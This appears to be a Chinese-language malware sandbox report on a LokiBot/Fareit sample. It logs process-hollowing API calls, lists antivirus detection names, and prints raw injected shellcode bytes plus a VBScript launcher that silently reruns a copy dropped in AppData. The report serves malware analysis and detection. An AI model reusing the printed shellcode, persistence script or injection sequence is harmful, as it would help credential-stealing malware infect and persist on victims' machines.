buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000f0000
success 1 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exe" webSet NOtWRwkxfrv = CreateoBjecT("wscriPt.SheLl") NotWrWkxfRV.ruN """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x00100000
success 1 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (14 个事件)
Process injection Process 2244 called NtSetContextThread to modify thread in remote process 2760
Process injection Process 3196 called NtSetContextThread to modify thread in remote process 3272
Process injection Process 3452 called NtSetContextThread to modify thread in remote process 3528
Process injection Process 3716 called NtSetContextThread to modify thread in remote process 3788
Process injection Process 1320 called NtSetContextThread to modify thread in remote process 2032
Process injection Process 3240 called NtSetContextThread to modify thread in remote process 3384
Process injection Process 3620 called NtSetContextThread to modify thread in remote process 1344
Time & API Arguments Status Return Repeated
1619605681.349
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2760
success 0 0
1619605692.6925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3272
success 0 0
1619605699.39625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3528
success 0 0
1619605708.17725
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3788
success 0 0
1619605723.395625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2032
success 0 0
1619605734.146
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619605741.332625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1344
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (14 个事件)
Process injection Process 2244 resumed a thread in remote process 2760
Process injection Process 3196 resumed a thread in remote process 3272
Process injection Process 3452 resumed a thread in remote process 3528
Process injection Process 3716 resumed a thread in remote process 3788
Process injection Process 1320 resumed a thread in remote process 2032
Process injection Process 3240 resumed a thread in remote process 3384
Process injection Process 3620 resumed a thread in remote process 1344
Time & API Arguments Status Return Repeated
1619605682.005
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2760
success 0 0
1619605693.4735
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3272
success 0 0
1619605700.16225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3528
success 0 0
1619605708.97425
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3788
success 0 0
1619605727.114625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2032
success 0 0
1619605735.708
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3384
success 0 0
1619605741.864625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1344
success 0 0
Executed a process and injected code into it, probably while unpacking (50 out of 62 个事件)
Time & API Arguments Status Return Repeated
1619596028.189879
CreateProcessInternalW
thread_identifier: 2272
thread_handle: 0x0000011c
process_identifier: 2208
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000f0000
success 0 0
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00100000
success 0 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000f0000
success 1 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\757bc8ab5108fb1a24919f43e0bde7e2.exe" webSet NOtWRwkxfrv = CreateoBjecT("wscriPt.SheLl") NotWrWkxfRV.ruN """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x00100000
success 1 0
1619605680.09875
CreateProcessInternalW
thread_identifier: 2436
thread_handle: 0x000000d0
process_identifier: 2244
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619605681.146
CreateProcessInternalW
thread_identifier: 2732
thread_handle: 0x0000011c
process_identifier: 2760
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605681.146
NtUnmapViewOfSection
process_identifier: 2760
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605681.177
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2760
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605681.349
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605681.349
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2760
success 0 0
1619605682.005
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2760
success 0 0
1619605682.115
CreateProcessInternalW
thread_identifier: 2864
thread_handle: 0x00000120
process_identifier: 2856
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 2760 28890843
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605691.223375
CreateProcessInternalW
thread_identifier: 3200
thread_handle: 0x000001b0
process_identifier: 3196
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000001b4
inherit_handles: 0
success 1 0
1619605692.4895
CreateProcessInternalW
thread_identifier: 3276
thread_handle: 0x0000011c
process_identifier: 3272
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605692.4895
NtUnmapViewOfSection
process_identifier: 3272
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605692.5205
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3272
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605692.6925
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605692.6925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3272
success 0 0
1619605693.4735
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3272
success 0 0
1619605694.2705
CreateProcessInternalW
thread_identifier: 3344
thread_handle: 0x00000120
process_identifier: 3340
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3272 28902312
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605697.94325
CreateProcessInternalW
thread_identifier: 3456
thread_handle: 0x00000144
process_identifier: 3452
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000148
inherit_handles: 0
success 1 0
1619605699.28725
CreateProcessInternalW
thread_identifier: 3532
thread_handle: 0x0000011c
process_identifier: 3528
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605699.28725
NtUnmapViewOfSection
process_identifier: 3528
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605699.28725
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3528
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605699.39625
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605699.39625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3528
success 0 0
1619605700.16225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3528
success 0 0
1619605701.63025
CreateProcessInternalW
thread_identifier: 3596
thread_handle: 0x00000120
process_identifier: 3592
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3528 28909000
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605705.8325
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x00000168
process_identifier: 3716
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000016c
inherit_handles: 0
success 1 0
1619605707.94325
CreateProcessInternalW
thread_identifier: 3792
thread_handle: 0x0000011c
process_identifier: 3788
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605707.94325
NtUnmapViewOfSection
process_identifier: 3788
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605707.95825
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3788
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605708.16225
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605708.17725
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3788
success 0 0
1619605708.97425
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3788
success 0 0
1619605709.83325
CreateProcessInternalW
thread_identifier: 3852
thread_handle: 0x00000120
process_identifier: 3848
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3788 28917828
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605720.8175
CreateProcessInternalW
thread_identifier: 1948
thread_handle: 0x000001c0
process_identifier: 1320
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000001c4
inherit_handles: 0
success 1 0
1619605723.145625
CreateProcessInternalW
thread_identifier: 1056
thread_handle: 0x0000011c
process_identifier: 2032
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605723.145625
NtUnmapViewOfSection
process_identifier: 2032
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605723.207625
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2032
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605723.379625
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605723.395625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2032
success 0 0
1619605727.114625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2032
success 0 0
1619605727.286625
CreateProcessInternalW
thread_identifier: 2200
thread_handle: 0x00000120
process_identifier: 2440
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 2032 28935953
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605732.614625
CreateProcessInternalW
thread_identifier: 3244
thread_handle: 0x00000154
process_identifier: 3240
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000158
inherit_handles: 0
success 1 0
1619605734.068
CreateProcessInternalW
thread_identifier: 3388
thread_handle: 0x0000011c
process_identifier: 3384
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605734.068
NtUnmapViewOfSection
process_identifier: 3384
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605734.083
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3384
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605734.146
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
File has been identified by 59 AntiVirus engines on VirusTotal as malicious (50 out of 59 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
ClamAV Win.Dropper.LokiBot-9089193-0
McAfee Fareit-FVZ!757BC8AB5108
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Trojan ( 0056b5241 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Trojan ( 0056b5241 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Delf.FareIt.Gen.7
Cyren W32/Trojan.ZNOJ-5662
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Trojan.Delf.FareIt.Gen.7
NANO-Antivirus Trojan.Win32.Androm.horyrb
Paloalto generic.ml
MicroWorld-eScan Trojan.Delf.FareIt.Gen.7
Ad-Aware Trojan.Delf.FareIt.Gen.7
Emsisoft Trojan.Delf.FareIt.Gen.7 (B)
Comodo Malware@#1ase7dxzpjg7o
F-Secure Trojan.TR/Kryptik.iypep
DrWeb Trojan.PWS.Stealer.28942
Zillya Trojan.Injector.Win32.752283
TrendMicro TrojanSpy.Win32.LOKI.SMAD1.hp
McAfee-GW-Edition BehavesLike.Win32.Fareit.dc
FireEye Generic.mg.757bc8ab5108fb1a
Sophos Mal/Generic-S + Troj/AutoG-IQ
Ikarus Trojan.Inject
Jiangmin Backdoor.Androm.axaq
Webroot W32.Malware.Gen
Avira TR/Kryptik.iypep
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Kingsoft Win32.Hack.Undef.(kcloud)
Microsoft PWS:Win32/Fareit.AQ!MTB
AegisLab Trojan.Multi.Generic.4!c
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Trojan.Delf.FareIt.Gen.7
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
VBA32 TScope.Trojan.Delf
ALYac Trojan.Delf.FareIt.Gen.7
MAX malware (ai score=100)
Malwarebytes Spyware.LokiBot
ESET-NOD32 a variant of Win32/Injector.EMTN
TrendMicro-HouseCall TrojanSpy.Win32.LOKI.SMAD1.hp
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

